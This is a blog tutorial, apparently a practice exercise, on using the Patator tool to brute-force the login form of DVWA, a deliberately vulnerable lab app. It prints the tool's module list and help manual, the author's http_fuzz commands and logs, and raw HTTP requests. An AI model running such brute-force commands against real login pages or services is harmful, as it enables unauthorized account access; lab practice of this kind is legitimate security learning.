Use Patator To Brute Force DVWA login Page

Posted by Suraj Singh on January 10, 2019 · 13 mins read
Hello readers,



Welcome Again To my Blog. In This Post, I'm going to post Another Usages Example of How To Use Patator Password Cracking Tool Against DVWA login Page As a practice exercise. so, that we can learn the usages of Patator.

Before Starting This Tutorial, I would like to share my opinion about Patator. And According To me, Patator is Awesome, Very Easy To Use, Smart, Good And Very Helpful Plus User readersly. Want To Read More/Install it. Click here

Here, for This Tutorial Purpose I am using DVWA (Damn Vulnerable Web Application). For More Info,

How To Setup DVWA in Virutal Box
Setup DVWA in Windows




So, Let's Start With Quickly Setup of DVWA.


Now, Create A Folder And Open Your Terminal into That Folder.

Patator Help Main Menu

 
$ patator.py http-fuzz
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help

Available modules:
+ ftp_login : Brute-force FTP
+ ssh_login : Brute-force SSH
+ telnet_login : Brute-force Telnet
+ smtp_login : Brute-force SMTP
+ smtp_vrfy : Enumerate valid users using SMTP VRFY
+ smtp_rcpt : Enumerate valid users using SMTP RCPT TO
+ finger_lookup : Enumerate valid users using Finger
+ http_fuzz : Brute-force HTTP
+ rdp_gateway : Brute-force RDP Gateway
+ ajp_fuzz : Brute-force AJP
+ pop_login : Brute-force POP3
+ pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/)
+ imap_login : Brute-force IMAP4
+ ldap_login : Brute-force LDAP
+ smb_login : Brute-force SMB
+ smb_lookupsid : Brute-force SMB SID-lookup
+ rlogin_login : Brute-force rlogin
+ vmauthd_login : Brute-force VMware Authentication Daemon
+ mssql_login : Brute-force MSSQL
+ oracle_login : Brute-force Oracle
+ mysql_login : Brute-force MySQL
+ mysql_query : Brute-force MySQL queries
+ rdp_login : Brute-force RDP (NLA)
+ pgsql_login : Brute-force PostgreSQL
+ vnc_login : Brute-force VNC
+ dns_forward : Forward DNS lookup
+ dns_reverse : Reverse DNS lookup
+ snmp_login : Brute-force SNMP v1/2/3
+ ike_enum : Enumerate IKE transforms
+ unzip_pass : Brute-force the password of encrypted ZIP files
+ keystore_pass : Brute-force the password of Java keystore files
+ sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
+ umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
+ tcp_fuzz : Fuzz TCP services
+ dummy_test : Testing module

Patator Http_Fuzz Module Help Manual

 
$ patator.py http_fuzz --help
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: http_fuzz [global-options ...]

Examples:
http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500
http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'

Module options:
url : target url (scheme://host[:port]/path?query)
body : body data
header : use custom headers
method : method to use [GET|POST|HEAD|...]
raw_request : load request from file
scheme : scheme [http|https]
auto_urlencode: automatically perform URL-encoding [1|0]
user_pass : username and password for HTTP authentication (user:pass)
auth_type : type of HTTP authentication [basic | digest | ntlm]
follow : follow any Location redirect [0|1]
max_follow : redirection limit [5]
accept_cookie : save received cookies to issue them in future requests [0|1]
proxy : proxy to use (host:port)
proxy_type : proxy type [http|socks4|socks4a|socks5]
resolve : hostname to IP address resolution to use (hostname:IP)
ssl_cert : client SSL certificate file (cert+key in PEM format)
timeout_tcp : seconds to wait for a TCP handshake [10]
timeout : seconds to wait for a HTTP response [20]
before_urls : comma-separated URLs to query before the main request
before_header : use a custom header in the before_urls request
before_egrep : extract data from the before_urls response to place in the main request
after_urls : comma-separated URLs to query after the main request
max_mem : store no more than N bytes of request+response data in memory [-1 (unlimited)]
persistent : use persistent connections [1|0]

Global options:
--version show program's version number and exit
-h, --help show this help message and exit

Execution:
-x arg actions and conditions, see Syntax below
--start=N start from offset N in the wordlist product
--stop=N stop at offset N
--resume=r1[,rN]* resume previous run
-e arg encode everything between two tags, see Syntax below
-C str delimiter string in combo files (default is ':')
-X str delimiter string in conditions (default is ',')
--allow-ignore-failures
failures cannot be ignored with -x (this is by design
to avoid false negatives) this option overrides this
behavior

Optimization:
--rate-limit=N wait N seconds between each test (default is 0)
--timeout=N wait N seconds for a response before retrying payload
(default is 0)
--max-retries=N skip payload after N retries (default is 4) (-1 for
unlimited)
-t N, --threads=N number of threads (default is 10)

Logging:
-l DIR save output and response data into DIR
-L SFX automatically save into DIR/yyyy-mm-dd/hh:mm:ss_SFX
(DIR defaults to '/tmp/patator')

Debugging:
-d, --debug enable debug messages

Syntax:
-x actions:conditions

actions := action[,action]*
action := "ignore" | "retry" | "free" | "quit" | "reset"
conditions := condition=value[,condition=value]*
condition := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep" | "clen"

ignore : do not report
retry : try payload again
free : dismiss future similar payloads
quit : terminate execution now
reset : close current connection in order to reconnect next time

code : match status code
size : match size (N or N-M or N- or -N)
time : match time (N or N-M or N- or -N)
mesg : match message
fgrep : search for string in mesg
egrep : search for regex in mesg
clen : match Content-Length header (N or N-M or N- or -N)

For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'

-e tag:encoding

tag := any unique string (eg. T@G or _@@_ or ...)
encoding := "unhex" | "sha1" | "b64" | "url" | "hex" | "md5"

unhex : decode from hexadecimal
sha1 : hash in sha1
b64 : encode in base64
url : url encode
hex : encode in hexadecimal
md5 : hash in md5

For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64

Please read the README inside for more examples and usage information.


So, Let's Start with Demo Request:


$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=password&Login=Login#' 0=../files/pass_filter -x quit:code=301

Please Read Above Provide HTTP_FUZZ Module Manual To Understand The meaning of Parameters.
Actually, I sent that parameter just To Understand patator Parameter Concept.
Then, I Follow Below Steps To Make Things More Clear.

$ mkdir logs 
 
 
 
$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=password&Login=Login#' 0=../files/pass_filter -x quit:code=301 -l ./logs 
 
 
 
$ cat logs/RUNTIME.log 
$ http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body=username=admin&password=password&Login=Login# 0=../files/pass_filter -x quit:code=301 -l ./logs
00:33:47 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-01-10 00:33 IST
00:33:47 patator INFO -
00:33:47 patator INFO - code size:clen time | candidate | num | mesg
00:33:47 patator INFO - -----------------------------------------------------------------------------
00:33:47 patator INFO - 302 501:0 0.006 | | 1 | HTTP/1.1 302 Found
00:33:48 patator INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 1 r/s, Time: 0h 0m 0s 
 
 
 
$ cat logs/RESULTS.csv 
time,level,code,size:clen,time,candidate,num,mesg
00:33:47,INFO,302,501:0,0.006,"",1,"HTTP/1.1 302 Found" 
 
 

Raw Request And Response Record

$ cat logs/1_302-501\:0-0.006.txt 
POST /login.php HTTP/1.1
Host: 192.168.43.131
User-Agent: Mozilla/5.0
Accept: */*
Content-Length: 47
Content-Type: application/x-www-form-urlencoded

username=admin&password=password&Login=Login%23

HTTP/1.1 302 Found
Date: Wed, 09 Jan 2019 19:03:01 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=falpigu76cuj0o3v0vmv3uu6f1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: security=high
Location: index.php
Content-Length: 0
Content-Type: text/html 
 
 

Well, After Examination Of Patator Generated Request And Server Response, here its my fine tune command
and its Output Also


$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=FILE0&Login=Login#' 0=../files/pass_filter -x quit:fgrep='Location: index.php'
00:44:27 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-01-10 00:44 IST
00:44:27 patator INFO -
00:44:27 patator INFO - code size:clen time | candidate | num | mesg
00:44:27 patator INFO - -----------------------------------------------------------------------------
00:44:27 patator INFO - 302 501:0 0.027 | password | 1 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.012 | passw0rd | 2 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.027 | passcode | 12 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.012 | passport | 3 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.005 | passions | 4 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.019 | passion1 | 5 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.009 | pass1234 | 6 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.024 | passward | 11 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.029 | passwoed | 22 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.041 | passion2 | 13 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.033 | passion7 | 14 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.024 | passwrod | 15 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.028 | passion8 | 16 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.021 | passwort | 7 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.013 | passwerd | 8 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.015 | passowrd | 9 | HTTP/1.1 302 Found
00:44:27 patator INFO - Hits/Done/Skip/Fail/Size: 16/16/0/0/1055, Avg: 79 r/s, Time: 0h 0m 0s
00:44:27 patator INFO - To resume execution, pass --resume 2,3,2,2,2,2,1,1,1,0



I Hope, This Heavy Data post Was Helpful for You To Understand How Patator Works.
Actually, During The Usage of Patator I Feel, Its Still Need Big Improvements.